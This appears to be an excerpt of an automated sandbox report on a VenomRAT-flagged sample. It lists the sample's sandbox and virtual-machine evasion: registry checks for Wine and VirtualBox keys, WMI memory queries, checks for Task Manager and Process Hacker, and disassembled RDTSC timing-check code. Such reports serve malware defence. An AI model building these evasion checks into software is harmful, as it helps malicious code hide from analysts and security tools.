Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected VenomRAT

Source: Yara match	File source: 00000009.00000003.2548466156.00000000050F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ZiYbk6W.exe PID: 3992, type: MEMORYSTR

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\Desktop\file.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess			graph_0-13021
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess			graph_1-9679

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015343001\ZiYbk6W.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1015353001\232a1df2aa.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1015355001\2befb05fec.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: ZiYbk6W.exe, 00000009.00000003.2548466156.00000000050F0000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 89668A second address: 89669D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6D1959691Ah 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 89669D second address: 8966A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8966A1 second address: 8966BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F6D1959691Ch 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8966BA second address: 8966BF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A155F second address: 8A159E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F6D19596916h 0x0000000a popad 0x0000000b jbe 00007F6D19596922h 0x00000011 jmp 00007F6D19596921h 0x00000016 popad 0x00000017 pushad 0x00000018 jbe 00007F6D1959691Ch 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A187B second address: 8A1885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A1C97 second address: 8A1C9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A1C9D second address: 8A1CA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A502B second address: 8A502F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A50EE second address: 8A50F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A50F4 second address: 8A511C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F6D19596927h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A511C second address: 8A51C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jns 00007F6D18BC6CCDh 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jmp 00007F6D18BC6CC8h 0x00000017 pop eax 0x00000018 mov dword ptr [ebp+122D1C7Ch], edi 0x0000001e push 00000003h 0x00000020 pushad 0x00000021 add edi, 7D1A77E7h 0x00000027 mov si, ax 0x0000002a popad 0x0000002b push 00000000h 0x0000002d mov edi, 540D7F06h 0x00000032 push 00000003h 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007F6D18BC6CB8h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 0000001Dh 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e adc di, 2500h 0x00000053 add dword ptr [ebp+122D1FE3h], esi 0x00000059 call 00007F6D18BC6CB9h 0x0000005e jmp 00007F6D18BC6CBDh 0x00000063 push eax 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 push edx 0x00000068 pop edx 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A51C6 second address: 8A51D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F6D19596916h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A51D4 second address: 8A520C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ebx 0x0000000c jnc 00007F6D18BC6CBCh 0x00000012 pop ebx 0x00000013 mov eax, dword ptr [eax] 0x00000015 jmp 00007F6D18BC6CBFh 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push esi 0x0000001f pushad 0x00000020 jno 00007F6D18BC6CB6h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A520C second address: 8A5291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F6D19596918h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 00000014h 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 call 00007F6D19596929h 0x00000026 call 00007F6D19596922h 0x0000002b or dword ptr [ebp+122D26E6h], ebx 0x00000031 pop edx 0x00000032 pop ecx 0x00000033 lea ebx, dword ptr [ebp+12459F4Bh] 0x00000039 push edi 0x0000003a sub edi, dword ptr [ebp+122D2BB6h] 0x00000040 pop ecx 0x00000041 mov dword ptr [ebp+122D3931h], edx 0x00000047 xchg eax, ebx 0x00000048 jmp 00007F6D19596924h 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A52F4 second address: 8A5340 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F6D18BC6CB8h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 push 00000000h 0x00000025 jp 00007F6D18BC6CBAh 0x0000002b push DA17AE9Bh 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 jmp 00007F6D18BC6CBDh 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A5340 second address: 8A5345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A5345 second address: 8A53AD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F6D18BC6CC9h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 25E851E5h 0x00000012 mov dword ptr [ebp+122D37BDh], ecx 0x00000018 mov si, di 0x0000001b push 00000003h 0x0000001d call 00007F6D18BC6CBDh 0x00000022 movzx edi, dx 0x00000025 pop edx 0x00000026 push 00000000h 0x00000028 xor si, 5D5Fh 0x0000002d push 00000003h 0x0000002f sub edx, dword ptr [ebp+122D2CAEh] 0x00000035 push A8F21C87h 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F6D18BC6CC0h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A53AD second address: 8A5411 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6D19596918h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 170DE379h 0x00000013 pushad 0x00000014 mov dword ptr [ebp+122D1C61h], esi 0x0000001a and esi, 34998A9Ah 0x00000020 popad 0x00000021 lea ebx, dword ptr [ebp+12459F54h] 0x00000027 pushad 0x00000028 jc 00007F6D1959692Ah 0x0000002e jmp 00007F6D19596924h 0x00000033 mov ebx, 23AD0800h 0x00000038 popad 0x00000039 xchg eax, ebx 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d pushad 0x0000003e popad 0x0000003f jmp 00007F6D19596925h 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A5411 second address: 8A5417 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8A5417 second address: 8A541B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8C4BD5 second address: 8C4C37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jne 00007F6D18BC6CB6h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e push eax 0x0000000f jmp 00007F6D18BC6CC7h 0x00000014 jmp 00007F6D18BC6CBAh 0x00000019 pop eax 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push esi 0x0000001f jmp 00007F6D18BC6CC3h 0x00000024 pop esi 0x00000025 push ebx 0x00000026 jmp 00007F6D18BC6CC6h 0x0000002b pop ebx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8C2D6D second address: 8C2D85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6D19596924h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8C303A second address: 8C3054 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D18BC6CC4h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8C335C second address: 8C3360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8C3623 second address: 8C362D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F6D18BC6CB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8C3925 second address: 8C393E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F6D1959691Fh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8C393E second address: 8C3983 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D18BC6CC1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F6D18BC6CC8h 0x00000015 push eax 0x00000016 pop eax 0x00000017 popad 0x00000018 jns 00007F6D18BC6CBEh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8C3983 second address: 8C3994 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6D1959691Ch 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8C3AD4 second address: 8C3AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F6D18BC6CBDh 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8CADF8 second address: 8CAE0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D19596921h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8CAE0D second address: 8CAE20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6D18BC6CBEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8CFD6C second address: 8CFD88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6D19596926h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88FCC4 second address: 88FCCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88FCCA second address: 88FCD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88FCD0 second address: 88FCD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8CF44A second address: 8CF44E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8CF44E second address: 8CF455 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8CF578 second address: 8CF58C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6D19596916h 0x00000008 jp 00007F6D19596916h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8CF58C second address: 8CF592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8CF6C1 second address: 8CF6C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8CF6C5 second address: 8CF6D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c jo 00007F6D18BC6CB6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8CFAB6 second address: 8CFAE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D19596926h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push ebx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007F6D19596916h 0x00000016 js 00007F6D19596916h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D30AC second address: 8D30DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jp 00007F6D18BC6CCDh 0x0000000d jmp 00007F6D18BC6CC7h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 js 00007F6D18BC6CC9h 0x0000001c push eax 0x0000001d push edx 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D30DE second address: 8D3114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D1959691Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F6D19596923h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jc 00007F6D19596924h 0x0000001a push eax 0x0000001b push edx 0x0000001c jno 00007F6D19596916h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D3430 second address: 8D3434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D3434 second address: 8D3439 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D3677 second address: 8D367E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D367E second address: 8D3683 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D3BE1 second address: 8D3BE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D3F59 second address: 8D3F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D4067 second address: 8D407C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6D18BC6CC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D407C second address: 8D4086 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6D1959691Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D61E0 second address: 8D61F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6D18BC6CBFh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D61F4 second address: 8D6290 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6D1959691Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F6D19596918h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ecx 0x0000002c call 00007F6D19596918h 0x00000031 pop ecx 0x00000032 mov dword ptr [esp+04h], ecx 0x00000036 add dword ptr [esp+04h], 00000014h 0x0000003e inc ecx 0x0000003f push ecx 0x00000040 ret 0x00000041 pop ecx 0x00000042 ret 0x00000043 mov dword ptr [ebp+122D1F64h], ecx 0x00000049 push 00000000h 0x0000004b push 00000000h 0x0000004d push edi 0x0000004e call 00007F6D19596918h 0x00000053 pop edi 0x00000054 mov dword ptr [esp+04h], edi 0x00000058 add dword ptr [esp+04h], 00000016h 0x00000060 inc edi 0x00000061 push edi 0x00000062 ret 0x00000063 pop edi 0x00000064 ret 0x00000065 mov edi, dword ptr [ebp+122D283Dh] 0x0000006b xchg eax, ebx 0x0000006c jmp 00007F6D19596922h 0x00000071 push eax 0x00000072 push eax 0x00000073 push edx 0x00000074 jmp 00007F6D1959691Ah 0x00000079 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D6D5F second address: 8D6D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8D6D64 second address: 8D6DC6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6D19596918h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F6D19596918h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 jmp 00007F6D19596921h 0x0000002e push 00000000h 0x00000030 mov dword ptr [ebp+122D1D69h], esi 0x00000036 push 00000000h 0x00000038 mov esi, dword ptr [ebp+122D2C2Eh] 0x0000003e xchg eax, ebx 0x0000003f pushad 0x00000040 pushad 0x00000041 jmp 00007F6D19596920h 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
